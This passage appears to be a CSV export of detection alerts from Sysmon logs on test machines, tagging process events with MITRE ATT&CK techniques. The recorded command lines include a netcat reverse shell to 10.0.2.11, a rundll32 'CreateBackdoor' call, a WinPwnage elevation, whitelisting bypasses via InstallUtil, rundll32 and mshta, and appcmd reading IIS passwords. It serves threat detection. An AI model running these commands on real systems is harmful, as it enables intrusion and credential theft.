C:\Windows\System32\sysprep\sysprep.exe
"C:\Windows\System32\sysprep\sysprep.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"
1
5
4
1
0
0x8000000000000000
424081
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.171
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
00000000-0000-0000-0000-000000000000
1216
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
1
5
4
1
0
0x8000000000000000
424081
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.171
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
00000000-0000-0000-0000-000000000000
1216
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
1
5
4
1
0
0x8000000000000000
424081
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.171
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
00000000-0000-0000-0000-000000000000
1216
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5970
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.834
365ABB72-3D6F-5CEB-0000-0010B2D3FF00
3848
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1,"
1
5
4
1
0
0x8000000000000000
16243
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 00:32:30.023
365ABB72-699E-5CD7-0000-001073582200
3876
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-5DEC-5CD7-0000-00204A380100
0x1384a
1
High
SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-6998-5CD7-0000-00104E422200
2740
C:\Python27\python.exe
python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1,"
1
5
4
1
0
0x8000000000000000
6168
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:38.231
365ABB72-FE66-5CEB-0000-001058F50B00
3256
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c whoami /groups
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1,"
1
5
4
1
0
0x8000000000000000
556863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:08.339
747F3D96-1834-610F-0000-00105FE5D300
6576
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1,"
1
5
4
1
0
0x8000000000000000
556863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:08.339
747F3D96-1834-610F-0000-00105FE5D300
6576
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1,"
1
5
4
1
0
0x8000000000000000
556863
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:08.339
747F3D96-1834-610F-0000-00105FE5D300
6576
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5967
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.714
365ABB72-3D6F-5CEB-0000-0010F2CFFF00
3844
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
1
5
4
1
0
0x8000000000000000
142033
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-11 23:22:26.451
747F3D96-DE32-5EB9-0000-00103FC14300
5252
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-5461-5EBA-0000-0020E7030000
0x3e7
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
580
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5435
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 12:06:55.471
747F3D96-78DF-5D45-0000-0010EF400401
4320
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-78DF-5D45-0000-0010BD350401
5756
C:\Windows\System32\Dism.exe
"C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
1
5
4
1
0
0x8000000000000000
556726
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:01.121
747F3D96-182D-610F-0000-00100344D300
11196
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\system32\
NT AUTHORITY\LOCAL SERVICE
747F3D96-90AF-610F-0000-0020E5030000
0x3e5
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
632
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"
1
5
4
1
0
0x8000000000000000
424079
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:36.627
747F3D96-51D0-5F93-0000-001079C05B00
8572
C:\Windows\SysWOW64\schtasks.exe
10.0.17763.1 (WinBuild.160101.0800)
Task Scheduler Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
schtasks.exe
schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
C:\Users\IEUser\AppData\Local\Temp\tmp1375\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002085A50800
0x8a585
1
High
SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8
747F3D96-51D0-5F93-0000-0010B2B35B00
5572
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4897
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:08.174
747F3D96-6614-5D3F-0000-001093CE8600
108
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5964
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.513
365ABB72-3D6F-5CEB-0000-0010CFCAFF00
3892
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
141993
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-11 23:21:56.654
747F3D96-DE14-5EB9-0000-001079154300
224
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe
c:\Users\IEUser\tools\PrivEsc\
NT AUTHORITY\SYSTEM
747F3D96-5461-5EBA-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DE14-5EB9-0000-00107C0F4300
4468
C:\Users\IEUser\Tools\Misc\nc64.exe
c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243520
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.533
747F3D96-9F61-5E75-0000-00103D6F1E00
7124
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243520
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.533
747F3D96-9F61-5E75-0000-00103D6F1E00
7124
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
556720
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:01.091
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
11.00.17763.1 (WinBuild.160101.0800)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
MSHTA.EXE
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
747F3D96-1239-610F-0000-0010D0210A00
600
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243520
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.533
747F3D96-9F61-5E75-0000-00103D6F1E00
7124
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contains suspicious command ( \mshta.exe),1,"
1
5
4
1
0
0x8000000000000000
556720
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:01.091
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
